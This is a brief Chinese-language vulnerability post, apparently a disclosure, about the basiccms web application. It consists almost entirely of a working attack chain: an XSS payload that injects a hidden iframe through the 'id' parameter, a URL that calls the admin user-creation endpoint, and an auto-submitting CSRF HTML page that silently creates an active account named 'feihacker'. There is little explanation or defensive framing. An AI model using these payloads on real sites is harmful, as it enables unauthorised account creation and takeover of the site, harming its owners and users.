basiccms 版本不太清楚了
菲哥哥
存在跨站:
http://localhost/basiccms/index.php?id=<iframe width='100' height='100' src=' http://localhost/basiccms/ CSRF.html
'>
http://localhost/basiccms/Admin/Users/AddModifyDelete.php?txtUserID=a&txtUserName=b&txtPassword=c&txtEmail=dqq.com&chkActive=&txtID=0&txtActive=Y&txtView=Active 、
CSRF
http://localhost/basiccms/index.php?id=<iframe width='0' height='0' src='http://localhost/basiccms/CSRF.html'>
CSRF 代码
<html>
<head>basiccms 菲哥哥</head>
<body onload=javascript:document.form.submit()>
<form action="http://localhost/basiccms/Admin/Users/AddModifyDelete.php" method="post" name="form">
<input type="hidden" name="txtUserID" value="feihacker">
<input type="hidden" name="txtUserName" value="feihacker">
<input type="hidden" name="txtPassword" value="feihacker">
<input type="hidden" name="txtEmail" value="xxxx@qq.com">
<input type="hidden" name="chkActive" >
<input type="hidden" name="txtID" value="0">
<input type="hidden" name="txtActive" value="Y">
<input type="hidden" name="txtView" value="Active">
</body>
</html>